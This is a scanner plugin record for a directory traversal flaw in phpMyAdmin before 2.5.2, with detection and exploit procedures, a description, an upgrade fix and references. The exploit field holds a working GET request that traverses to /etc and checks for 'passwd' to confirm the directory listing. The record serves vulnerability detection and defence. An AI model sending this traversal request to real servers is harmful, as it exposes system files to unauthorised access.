Plugin ID | 342 |
Plugin name | phpMyAdmin prior 2.5.2 db_details_importdocsql.php directory traversal |
Plugin filename | phpMyAdmin prior 2.5.2 db_details_importdocsql.php directory traversal.plugin |
Plugin filesize | 3192 bytes |
Plugin family | CGI |
Plugin created name | Marc Ruef |
Plugin created email | marc.ruef at computec.ch |
Plugin created web | http://www.computec.ch |
Plugin created company | computec.ch |
Plugin created date | 2005/01/09 |
Plugin version | 1.0 |
Plugin protocol | tcp |
Plugin port | 80 |
Plugin procedure detection | open|send GET /main.php HTTP/1.0\n\n|sleep|close|pattern_exists HTTP/#.# 200 *Welcome *to *phpMyAdmin*2.[0-4].*</h1>* OR HTTP/#.# 200 *Welcome *to *phpMyAdmin*2.5.[0-2]*</h1>* |
Plugin procedure exploit | open|send GET /db_details_importdocsql.php?submit_show=true&do=import&docpath=../../../../../../../../../../etc HTTP/1.0\n\n|sleep|close|pattern_exists HTTP/#.# 200 *Ignoring file passwd* |
Plugin detection accuracy | 80 |
Plugin exploit accuracy | 97 |
Plugin comment | The NASL script is Copyright (C) 2003 Tenable Network Security |
Bug published name | Lorenzo Manuel Hernandez Garcia-Hierro |
Bug published email | security at lorenzohgh.com |
Bug affected | phpMyAdmin prior 2.5.2 |
Bug not affected | phpMyAdmin newer than 2.5.2 |
Bug vulnerability class | Directory Traversal |
Bug description | The remote host is running a version of phpMyAdmin which is vulnerable to several flaws: It may be tricked into disclosing the physical path of the remote PHP installation, it is vulnerable to Cross-Site scripting, which may allow an attacker to steal the cookies of your users and it is vulnerable to a flaw which may allow an attacker to list the content of arbitrary directories on the remote server. An attacker may use these flaws to gain more knowledge about the remote host and therefore set up more complex attacks against it. |
Bug solution | Upgrade to phpMyAdmin 2.5.2 or newer. |
Bug fixing time | Approx. 30 minutes |
Bug exploit availability | Yes |
Bug exploit url | http://www.securityfocus.com/bid/7962/exploit/ |
Bug remote | Yes |
Bug local | Yes |
Bug severity | High |
Bug popularity | 7 |
Bug simplicity | 8 |
Bug impact | 8 |
Bug risk | 8 |
Bug Nessus risk | Medium |
Bug check tools | Nessus can check this flaw with the plugin 11761 (phpMyAdmin multiple flaws). |
Source SecurityFocus BID | 7962 |
Source Nessus ID | 11761 |
Source Literature | Hacking Exposed: Network Security Secrets & Solutions, Stuart McClure, Joel Scambray and George Kurtz, February 25, 2003, 4th Edition, McGraw-Hill Osborne Media, ISBN 0072227427 |
Source Misc. | http://www.computec.ch |